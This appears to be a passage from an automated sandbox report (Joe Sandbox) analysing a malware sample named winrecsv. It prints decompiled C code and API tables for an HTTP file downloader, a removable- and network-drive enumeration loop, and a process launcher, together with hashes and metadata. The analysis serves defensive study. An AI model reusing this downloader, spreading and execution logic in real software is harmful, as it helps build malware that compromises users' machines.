                                                                                  						if( *_t55 == 0x69636c69) {
                                                                                  							if( *((char*)(_t55 + 0x275)) == 0) {
                                                                                  								_t62 = _t55 + 0x21c;
                                                                                  								_t40 = InterlockedExchangeAdd(_t62, 0);
                                                                                  								if(_t40 == 0) {
                                                                                  									 *(_t55 + 0x230) = _t40;
                                                                                  									 *((intOrPtr*)(_t55 + 0x220)) = 1;
                                                                                  									 *((intOrPtr*)(_t55 + 0x228)) = _t55 + 8;
                                                                                  									 *((intOrPtr*)(_t55 + 0x22c)) = 0x200;
                                                                                  									InterlockedIncrement(_t62);
                                                                                  									if(E0040EAD0(_t55) == 0) {
                                                                                  										InterlockedDecrement(_t62);
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						_t55 =  *((intOrPtr*)(_t55 + 0x280));
                                                                                  					} while (_t55 != 0);
                                                                                  					goto L11;
                                                                                  				}
                                                                                  			}










                                                                                  0x0040e480
                                                                                  0x0040e482
                                                                                  0x0040e5b7
                                                                                  0x0040e494
                                                                                  0x0040e496
                                                                                  0x0040e49a
                                                                                  0x0040e4a0
                                                                                  0x0040e4a5
                                                                                  0x0040e530
                                                                                  0x0040e530
                                                                                  0x0040e534
                                                                                  0x0040e53e
                                                                                  0x0040e544
                                                                                  0x0040e549
                                                                                  0x0040e563
                                                                                  0x0040e569
                                                                                  0x0040e572
                                                                                  0x0040e584
                                                                                  0x0040e58a
                                                                                  0x0040e590
                                                                                  0x0040e59a
                                                                                  0x0040e5a2
                                                                                  0x0040e5a6
                                                                                  0x00000000
                                                                                  0x0040e5b6
                                                                                  0x0040e551
                                                                                  0x0040e55b
                                                                                  0x0040e55d
                                                                                  0x0040e55e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e4ab
                                                                                  0x0040e4ab
                                                                                  0x0040e4b1
                                                                                  0x0040e4d3
                                                                                  0x0040e4d7
                                                                                  0x0040e4de
                                                                                  0x0040e4e6
                                                                                  0x0040e4ec
                                                                                  0x0040e4f2
                                                                                  0x0040e4fc
                                                                                  0x0040e502
                                                                                  0x0040e50c
                                                                                  0x0040e519
                                                                                  0x0040e51c
                                                                                  0x0040e51c
                                                                                  0x0040e519
                                                                                  0x0040e4e6
                                                                                  0x0040e4d3
                                                                                  0x0040e522
                                                                                  0x0040e528
                                                                                  0x00000000
                                                                                  0x0040e4ab

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(00000020,0040BD00,?,0040F024), ref: 0040E49A
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E4C6
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E4DE
                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 0040E50C
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040E51C
                                                                                  • LeaveCriticalSection.KERNEL32(00000020,?,0040F024), ref: 0040E534
                                                                                  • SetEvent.KERNEL32(?,?,0040F024), ref: 0040E53E
                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,0040F024), ref: 0040E55B
                                                                                  • CloseHandle.KERNEL32(?,?,?,0040F024), ref: 0040E584
                                                                                  • CloseHandle.KERNEL32(?,?,?,0040F024), ref: 0040E58A
                                                                                  • WSACloseEvent.WS2_32(?), ref: 0040E590
                                                                                  • DeleteCriticalSection.KERNEL32(00000020,?,?,?,0040F024), ref: 0040E5A6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                  • String ID: PCOI$ilci
                                                                                  • API String ID: 2403999931-3762367603
                                                                                  • Opcode ID: 8dd6da6e97fa57f1a7193440fcc103113cb784ba75cd11bc1955a2a87b358bb7
                                                                                  • Instruction ID: 93d8e349b18169af685d7a21951132cbb8c9c0fe64a1f5b9dbcdc35934fd6ed3
                                                                                  • Opcode Fuzzy Hash: 8dd6da6e97fa57f1a7193440fcc103113cb784ba75cd11bc1955a2a87b358bb7
                                                                                  • Instruction Fuzzy Hash: D3317475500705BBC710DBB1EC48B97B7A8BF08314F048E2EE95AA3691D778F864CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 68%
                                                                                  			E00404000() {
                                                                                  				struct HWND__* _v8;
                                                                                  				struct tagMSG _v36;
                                                                                  				struct _WNDCLASSEXW _v84;
                                                                                  				short _v596;
                                                                                  				unsigned int _t20;
                                                                                  				void* _t39;
                                                                                  				void* _t40;
                                                                                  
                                                                                  				do {
                                                                                  					_v84.cbSize = 0;
                                                                                  					memset( &(_v84.style), 0, 0x2c);
                                                                                  					_t40 = _t39 + 0xc;
                                                                                  					_v84.cbSize = 0x30;
                                                                                  					_v84.lpfnWndProc = E00403DB0;
                                                                                  					_v84.hInstance = GetModuleHandleW(0);
                                                                                  					_v84.lpszClassName =  &_v596;
                                                                                  					do {
                                                                                  						Sleep(1);
                                                                                  						_t20 = GetTickCount();
                                                                                  						wsprintfW( &_v596, L"%x%X", GetTickCount(), _t20 >> 1);
                                                                                  						_t40 = _t40 + 0x10;
                                                                                  					} while ((RegisterClassExW( &_v84) & 0x0000ffff) == 0);
                                                                                  					_v8 = CreateWindowExW(0, _v84.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _v84.hInstance, 0);
                                                                                  					if(_v8 != 0) {
                                                                                  						while(GetMessageA( &_v36, 0, 0, 0) > 0) {
                                                                                  							TranslateMessage( &_v36);
                                                                                  							DispatchMessageA( &_v36);
                                                                                  						}
                                                                                  						goto L7;
                                                                                  					}
                                                                                  					break;
                                                                                  					L7:
                                                                                  				} while (0 != 0);
                                                                                  				ExitThread(0);
                                                                                  			}










                                                                                  0x00404009
                                                                                  0x00404009
                                                                                  0x00404018
                                                                                  0x0040401d
                                                                                  0x00404020
                                                                                  0x00404027
                                                                                  0x00404036
                                                                                  0x0040403f
                                                                                  0x00404042
                                                                                  0x00404044
                                                                                  0x0040404a
                                                                                  0x00404066
                                                                                  0x0040406c
                                                                                  0x0040407c
                                                                                  0x004040a2
                                                                                  0x004040a9
                                                                                  0x004040ad
                                                                                  0x004040c5
                                                                                  0x004040cf
                                                                                  0x004040cf
                                                                                  0x00000000
                                                                                  0x004040ad
                                                                                  0x00000000
                                                                                  0x004040d7
                                                                                  0x004040d7
                                                                                  0x004040e1

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                  • String ID: %x%X$0
                                                                                  • API String ID: 716646876-225668902
                                                                                  • Opcode ID: f6d5b7525540a58df187482176236c9ba1dfeb2eb460690e0bb65cbcf38e7b1f
                                                                                  • Instruction ID: 19d221db94b3e63cef1269c4be0118e099b5cb739eae60d914623c84e45eccf5
                                                                                  • Opcode Fuzzy Hash: f6d5b7525540a58df187482176236c9ba1dfeb2eb460690e0bb65cbcf38e7b1f
                                                                                  • Instruction Fuzzy Hash: 3021F170A40318ABEB109BE0DC49FEE7B78BB44701F508129F705B61D0DBB955448B59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 513 40c610-40c6ab memset InternetCrackUrlA InternetOpenA 514 40c6b1-40c6e4 InternetConnectA 513->514 515 40c827-40c830 513->515 516 40c81a-40c821 InternetCloseHandle 514->516 517 40c6ea-40c71a HttpOpenRequestA 514->517 516->515 518 40c720-40c737 HttpSendRequestA 517->518 519 40c80d-40c814 InternetCloseHandle 517->519 520 40c800-40c807 InternetCloseHandle 518->520 521 40c73d-40c741 518->521 519->516 520->519 522 40c7f6 521->522 523 40c747 521->523 522->520 524 40c751-40c758 523->524 525 40c7e9-40c7f4 524->525 526 40c75e-40c780 InternetReadFile 524->526 525->520 527 40c782-40c789 526->527 528 40c78b 526->528 527->528 529 40c78d-40c7e4 call 408ea0 memcpy 527->529 528->525 529->524
                                                                                  C-Code - Quality: 82%
                                                                                  			E0040C610(char* _a4, char** _a8) {
                                                                                  				char _v260;
                                                                                  				char _v772;
                                                                                  				long _v776;
                                                                                  				void* _v780;
                                                                                  				intOrPtr _v792;
                                                                                  				char* _v796;
                                                                                  				signed short _v816;
                                                                                  				intOrPtr _v820;
                                                                                  				char* _v824;
                                                                                  				void _v836;
                                                                                  				void* _v840;
                                                                                  				void* _v844;
                                                                                  				void* _v848;
                                                                                  				char* _v852;
                                                                                  				void _v1876;
                                                                                  				long _v1880;
                                                                                  				void* _t91;
                                                                                  				void* _t92;
                                                                                  
                                                                                  				_v776 = 0;
                                                                                  				_v840 = 0;
                                                                                  				memset( &_v836, 0, 0x38);
                                                                                  				_t92 = _t91 + 0xc;
                                                                                  				_v840 = 0x3c;
                                                                                  				_v824 =  &_v260;
                                                                                  				_v820 = 0x100;
                                                                                  				_v796 =  &_v772;
                                                                                  				_v792 = 0x200;
                                                                                  				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                  				_v780 = InternetOpenA(0, 1, 0, 0, 0);
                                                                                  				if(_v780 != 0) {
                                                                                  					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                  					if(_v844 != 0) {
                                                                                  						_v848 = HttpOpenRequestA(_v844, "GET",  &_v772, 0, 0, 0, 0, 0);
                                                                                  						if(_v848 != 0) {
                                                                                  							if(HttpSendRequestA(_v848, 0, 0, 0, 0) != 0) {
                                                                                  								if(_a8 == 0) {
                                                                                  									_v776 = 1;
                                                                                  								} else {
                                                                                  									_v852 = 0;
                                                                                  									while(1 != 0) {
                                                                                  										_t87 = _v848;
                                                                                  										if(InternetReadFile(_v848,  &_v1876, 0x400,  &_v1880) != 0 && _v1880 != 0) {
                                                                                  											_v776 = E00408EA0(_v776, _t87, _v776,  &(_v852[_v1880]));
                                                                                  											memcpy( &(_v852[_v776]),  &_v1876, _v1880);
                                                                                  											_t92 = _t92 + 0x14;
                                                                                  											_v852 =  &(_v852[_v1880]);
                                                                                  											continue;
                                                                                  										}
                                                                                  										break;
                                                                                  									}
                                                                                  									 *_a8 = _v852;
                                                                                  								}
                                                                                  							}
                                                                                  							InternetCloseHandle(_v848);
                                                                                  						}
                                                                                  						InternetCloseHandle(_v844);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v780);
                                                                                  				}
                                                                                  				return _v776;
                                                                                  			}





















                                                                                  0x0040c619
                                                                                  0x0040c623
                                                                                  0x0040c638
                                                                                  0x0040c63d
                                                                                  0x0040c640
                                                                                  0x0040c650
                                                                                  0x0040c656
                                                                                  0x0040c666
                                                                                  0x0040c66c
                                                                                  0x0040c688
                                                                                  0x0040c69e
                                                                                  0x0040c6ab
                                                                                  0x0040c6d7
                                                                                  0x0040c6e4
                                                                                  0x0040c70d
                                                                                  0x0040c71a
                                                                                  0x0040c737
                                                                                  0x0040c741
                                                                                  0x0040c7f6
                                                                                  0x0040c747
                                                                                  0x0040c747
                                                                                  0x0040c751
                                                                                  0x0040c771
                                                                                  0x0040c780
                                                                                  0x0040c7a9
                                                                                  0x0040c7ca
                                                                                  0x0040c7cf
                                                                                  0x0040c7de
                                                                                  0x00000000
                                                                                  0x0040c7de
                                                                                  0x00000000
                                                                                  0x0040c780
                                                                                  0x0040c7f2
                                                                                  0x0040c7f2
                                                                                  0x0040c741
                                                                                  0x0040c807
                                                                                  0x0040c807
                                                                                  0x0040c814
                                                                                  0x0040c814
                                                                                  0x0040c821
                                                                                  0x0040c821
                                                                                  0x0040c830

                                                                                  APIs
                                                                                  • memset.NTDLL ref: 0040C638
                                                                                  • InternetCrackUrlA.WININET(0040D429,00000000,10000000,0000003C), ref: 0040C688
                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C698
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C6D1
                                                                                  • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C707
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C72F
                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C778
                                                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 0040C7CA
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C807
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C814
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C821
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                  • String ID: <$GET
                                                                                  • API String ID: 1205665004-427699995
                                                                                  • Opcode ID: ec5765e5f3d83dd079881a4ae8b9933272d244356d4eee572d68266342c5080b
                                                                                  • Instruction ID: 09436683f8244ffa9c701ea93985ed9ede5934815d9b1926990d38fc667447ad
                                                                                  • Opcode Fuzzy Hash: ec5765e5f3d83dd079881a4ae8b9933272d244356d4eee572d68266342c5080b
                                                                                  • Instruction Fuzzy Hash: 29512C759012289BDB35CB50CC99BD9B3BCAB48705F1081E9E60DAA2C0D7B86FC4CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 50%
                                                                                  			E004050B0() {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				short _v24;
                                                                                  				short _v556;
                                                                                  				short _v2604;
                                                                                  				intOrPtr _v2608;
                                                                                  				union _ULARGE_INTEGER _v2612;
                                                                                  				long _v2616;
                                                                                  				short _v3148;
                                                                                  				intOrPtr _v3152;
                                                                                  				intOrPtr _t34;
                                                                                  				intOrPtr _t38;
                                                                                  				struct %anon54 _t43;
                                                                                  				intOrPtr _t63;
                                                                                  				void* _t68;
                                                                                  				void* _t69;
                                                                                  				void* _t70;
                                                                                  
                                                                                  				Sleep(0x3e8);
                                                                                  				GetModuleFileNameW(0, 0x414418, 0x104);
                                                                                  				_t34 = E0040D530(0x414418);
                                                                                  				_t69 = _t68 + 4;
                                                                                  				 *0x414410 = _t34;
                                                                                  				while(1 != 0) {
                                                                                  					_v8 = E004048C0();
                                                                                  					_v12 = 2;
                                                                                  					while(_v12 <= 0x19) {
                                                                                  						_t38 = E00404860(_v8, _v12,  &_v24);
                                                                                  						_t69 = _t69 + 0xc;
                                                                                  						_v16 = _t38;
                                                                                  						_v3152 = _v16;
                                                                                  						if(_v3152 == 2 || _v3152 == 4) {
                                                                                  							GetVolumeInformationW( &_v24,  &_v3148, 0x105, 0, 0,  &_v2616, 0, 0);
                                                                                  							GetDiskFreeSpaceExW( &_v24, 0,  &_v2612, 0);
                                                                                  							_push(0);
                                                                                  							_push(0x40000000);
                                                                                  							_t63 = _v2608;
                                                                                  							_push(_t63);
                                                                                  							_t43 = _v2612.LowPart;
                                                                                  							_push(_t43);
                                                                                  							L0040F1B0();
                                                                                  							_push(_t63);
                                                                                  							wsprintfW( &_v556, L" (%dGB)", _t43);
                                                                                  							_t70 = _t69 + 0x10;
                                                                                  							if((_v3148 & 0x0000ffff) == 0) {
                                                                                  								wsprintfW( &_v3148, L"Unnamed volume");
                                                                                  								_t70 = _t70 + 8;
                                                                                  							}
                                                                                  							wsprintfW( &_v2604, L"%s%s",  &_v3148,  &_v556);
                                                                                  							E00404BD0( &_v24,  &_v2604, _v2616, ( &_v556 & 0xffffff00 | _v16 == 0x00000004) & 0x000000ff);
                                                                                  							_t69 = _t70 + 0x20;
                                                                                  						}
                                                                                  						_v12 = _v12 + 1;
                                                                                  					}
                                                                                  					Sleep(0x7d0);
                                                                                  				}
                                                                                  				ExitThread(0);
                                                                                  			}





















                                                                                  0x004050be
                                                                                  0x004050d0
                                                                                  0x004050db
                                                                                  0x004050e0
                                                                                  0x004050e3
                                                                                  0x004050e8
                                                                                  0x004050fa
                                                                                  0x004050fd
                                                                                  0x0040510f
                                                                                  0x00405125
                                                                                  0x0040512a
                                                                                  0x0040512d
                                                                                  0x00405133
                                                                                  0x00405140
                                                                                  0x0040516f
                                                                                  0x00405184
                                                                                  0x0040518a
                                                                                  0x0040518c
                                                                                  0x00405191
                                                                                  0x00405197
                                                                                  0x00405198
                                                                                  0x0040519e
                                                                                  0x0040519f
                                                                                  0x004051a4
                                                                                  0x004051b2
                                                                                  0x004051b8
                                                                                  0x004051c4
                                                                                  0x004051d2
                                                                                  0x004051d8
                                                                                  0x004051d8
                                                                                  0x004051f5
                                                                                  0x0040521b
                                                                                  0x00405220
                                                                                  0x00405220
                                                                                  0x0040510c
                                                                                  0x0040510c
                                                                                  0x0040522d
                                                                                  0x0040522d
                                                                                  0x0040523a

                                                                                  APIs
                                                                                  • Sleep.KERNEL32(000003E8), ref: 004050BE
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00414418,00000104), ref: 004050D0
                                                                                    • Part of subcall function 0040D530: CreateFileW.KERNEL32(P@,80000000,00000001,00000000,00000003,00000000,00000000,004050E0), ref: 0040D550
                                                                                    • Part of subcall function 0040D530: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D565
                                                                                    • Part of subcall function 0040D530: CloseHandle.KERNEL32(000000FF), ref: 0040D572
                                                                                  • ExitThread.KERNEL32 ref: 0040523A
                                                                                    • Part of subcall function 004048C0: GetLogicalDrives.KERNEL32 ref: 004048C6
                                                                                    • Part of subcall function 004048C0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00404914
                                                                                    • Part of subcall function 004048C0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404941
                                                                                    • Part of subcall function 004048C0: RegCloseKey.ADVAPI32(?), ref: 0040495E
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040522D
                                                                                    • Part of subcall function 00404860: lstrcpyW.KERNEL32 ref: 004048B3
                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040516F
                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00405184
                                                                                  • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040519F
                                                                                  • wsprintfW.USER32 ref: 004051B2
                                                                                  • wsprintfW.USER32 ref: 004051D2
                                                                                  • wsprintfW.USER32 ref: 004051F5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                  • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                  • API String ID: 1650488544-2117135753
                                                                                  • Opcode ID: f1572abb67f03b3e23ee054d932ea7d3a2152c95165b90b0fb75db5c9ca44455
                                                                                  • Instruction ID: a985ed85a03a777e582de5830084f45234a9f7b72307fd88a6662299d951ba90
                                                                                  • Opcode Fuzzy Hash: f1572abb67f03b3e23ee054d932ea7d3a2152c95165b90b0fb75db5c9ca44455
                                                                                  • Instruction Fuzzy Hash: 67418371D00214ABE754DB94DC45FEE7778EB48704F1085AAF209B51D0DA785B88CF6A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 577 40c040-40c070 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 578 40c076-40c08a InterlockedExchangeAdd 577->578 579 40c159-40c170 GetCurrentThread SetThreadPriority 577->579 578->579 580 40c090-40c099 578->580 581 40c09c-40c0a3 580->581 581->579 582 40c0a9-40c0c4 EnterCriticalSection 581->582 583 40c0cf-40c0d7 582->583 584 40c117-40c12c LeaveCriticalSection 583->584 585 40c0d9-40c0e6 583->585 588 40c137-40c13d 584->588 589 40c12e-40c135 584->589 586 40c0f3-40c115 WaitForSingleObject 585->586 587 40c0e8-40c0f1 585->587 590 40c0c6-40c0cc 586->590 587->590 591 40c14c-40c154 Sleep 588->591 592 40c13f-40c148 588->592 589->579 590->583 591->581 592->591 593 40c14a 592->593 593->579
                                                                                  C-Code - Quality: 80%
                                                                                  			E0040C040(LONG* _a4, intOrPtr _a8) {
                                                                                  				int _v8;
                                                                                  				long _v12;
                                                                                  				LONG* _v16;
                                                                                  				signed char _v17;
                                                                                  				long _v24;
                                                                                  				signed int _v28;
                                                                                  				signed int _t57;
                                                                                  				intOrPtr _t80;
                                                                                  
                                                                                  				_v8 = GetThreadPriority(GetCurrentThread());
                                                                                  				SetThreadPriority(GetCurrentThread(), 0xfffffffe);
                                                                                  				_v12 = 0;
                                                                                  				if(_a4 != 0) {
                                                                                  					_v16 = _a4;
                                                                                  					if(InterlockedExchangeAdd(_v16, 0) > 0) {
                                                                                  						_v17 = 0 | _a8 != 0xffffffff;
                                                                                  						while(1 != 0) {
                                                                                  							_v24 = 0;
                                                                                  							EnterCriticalSection( &(_v16[1]));
                                                                                  							_v28 = 0;
                                                                                  							while(_v28 <  *_v16) {
                                                                                  								if( *(_v16[7] + _v28 * 4) != 0) {
                                                                                  									_t57 = WaitForSingleObject( *(_v16[7] + _v28 * 4), 0);
                                                                                  									asm("sbb eax, eax");
                                                                                  									_v24 =  ~_t57 + 1 + _v24;
                                                                                  								} else {
                                                                                  									_v24 = _v24 + 1;
                                                                                  								}
                                                                                  								_v28 = _v28 + 1;
                                                                                  							}
                                                                                  							LeaveCriticalSection( &(_v16[1]));
                                                                                  							if(_v24 !=  *_v16) {
                                                                                  								if((_v17 & 0x000000ff) == 0) {
                                                                                  									L15:
                                                                                  									Sleep(1);
                                                                                  									continue;
                                                                                  								} else {
                                                                                  									_t80 = _a8 - 1;
                                                                                  									_a8 = _t80;
                                                                                  									if(_t80 != 0) {
                                                                                  										goto L15;
                                                                                  									} else {
                                                                                  									}
                                                                                  								}
                                                                                  							} else {
                                                                                  								_v12 = 1;
                                                                                  							}
                                                                                  							goto L16;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				L16:
                                                                                  				SetThreadPriority(GetCurrentThread(), _v8);
                                                                                  				return _v12;
                                                                                  			}











                                                                                  0x0040c053
                                                                                  0x0040c05f
                                                                                  0x0040c065
                                                                                  0x0040c070
                                                                                  0x0040c079
                                                                                  0x0040c08a
                                                                                  0x0040c099
                                                                                  0x0040c09c
                                                                                  0x0040c0a9
                                                                                  0x0040c0b7
                                                                                  0x0040c0bd
                                                                                  0x0040c0cf
                                                                                  0x0040c0e6
                                                                                  0x0040c102
                                                                                  0x0040c10a
                                                                                  0x0040c112
                                                                                  0x0040c0e8
                                                                                  0x0040c0ee
                                                                                  0x0040c0ee
                                                                                  0x0040c0cc
                                                                                  0x0040c0cc
                                                                                  0x0040c11e
                                                                                  0x0040c12c
                                                                                  0x0040c13d
                                                                                  0x0040c14c
                                                                                  0x0040c14e
                                                                                  0x00000000
                                                                                  0x0040c13f
                                                                                  0x0040c142
                                                                                  0x0040c145
                                                                                  0x0040c148
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040c14a
                                                                                  0x0040c148
                                                                                  0x0040c12e
                                                                                  0x0040c12e
                                                                                  0x0040c12e
                                                                                  0x00000000
                                                                                  0x0040c12c
                                                                                  0x0040c09c
                                                                                  0x0040c08a
                                                                                  0x0040c159
                                                                                  0x0040c164
                                                                                  0x0040c170

                                                                                  APIs
                                                                                  • GetCurrentThread.KERNEL32 ref: 0040C046
                                                                                  • GetThreadPriority.KERNEL32(00000000,?,0040E56E,?,000000FF,?,0040F024), ref: 0040C04D
                                                                                  • GetCurrentThread.KERNEL32 ref: 0040C058
                                                                                  • SetThreadPriority.KERNEL32(00000000,?,0040E56E,?,000000FF,?,0040F024), ref: 0040C05F
                                                                                  • InterlockedExchangeAdd.KERNEL32(000000FF,00000000), ref: 0040C082
                                                                                  • EnterCriticalSection.KERNEL32(000000FB), ref: 0040C0B7
                                                                                  • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040C102
                                                                                  • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040C11E
                                                                                  • Sleep.KERNEL32(00000001), ref: 0040C14E
                                                                                  • GetCurrentThread.KERNEL32 ref: 0040C15D
                                                                                  • SetThreadPriority.KERNEL32(00000000,?,0040E56E,?,000000FF), ref: 0040C164
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                  • String ID:
                                                                                  • API String ID: 3862671961-0
                                                                                  • Opcode ID: 5b3e761f1863bbc4b3393cbcc79310fac30a5adf336bc6d3d95560012fa03e52
                                                                                  • Instruction ID: b67d03a003be484ef9903f40ca498cf56af242f5343ef7d43787b118d94c6999
                                                                                  • Opcode Fuzzy Hash: 5b3e761f1863bbc4b3393cbcc79310fac30a5adf336bc6d3d95560012fa03e52
                                                                                  • Instruction Fuzzy Hash: E9414C74900209EBDB14DFA4D884BAEBB71FB48305F108266E915BB381D7799A81CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040D740(char _a4) {
                                                                                  				void* _v8;
                                                                                  				struct _PROCESS_INFORMATION _v24;
                                                                                  				struct _STARTUPINFOW _v100;
                                                                                  				intOrPtr _v104;
                                                                                  
                                                                                  				memset( &_v100, 0, 0x44);
                                                                                  				_v24.hProcess = 0;
                                                                                  				_v24.hThread = 0;
                                                                                  				_v24.dwProcessId = 0;
                                                                                  				_v24.dwThreadId = 0;
                                                                                  				_v100.cb = 0x44;
                                                                                  				_v100.dwFlags = 1;
                                                                                  				_v100.wShowWindow = 5;
                                                                                  				_t11 =  &_a4; // 0x40656e
                                                                                  				if(CreateProcessW(0,  *_t11, 0, 0, 0, 0x20, 0, 0,  &_v100,  &_v24) != 1) {
                                                                                  					_t12 =  &_a4; // 0x40656e
                                                                                  					_v8 = ShellExecuteW(0, L"open",  *_t12, 0, 0, 0);
                                                                                  					_v104 = _v8;
                                                                                  					if(_v104 <= 0x20) {
                                                                                  						return 0;
                                                                                  					}
                                                                                  					Sleep(0x3e8);
                                                                                  					return 1;
                                                                                  				}
                                                                                  				Sleep(0x3e8);
                                                                                  				return 1;
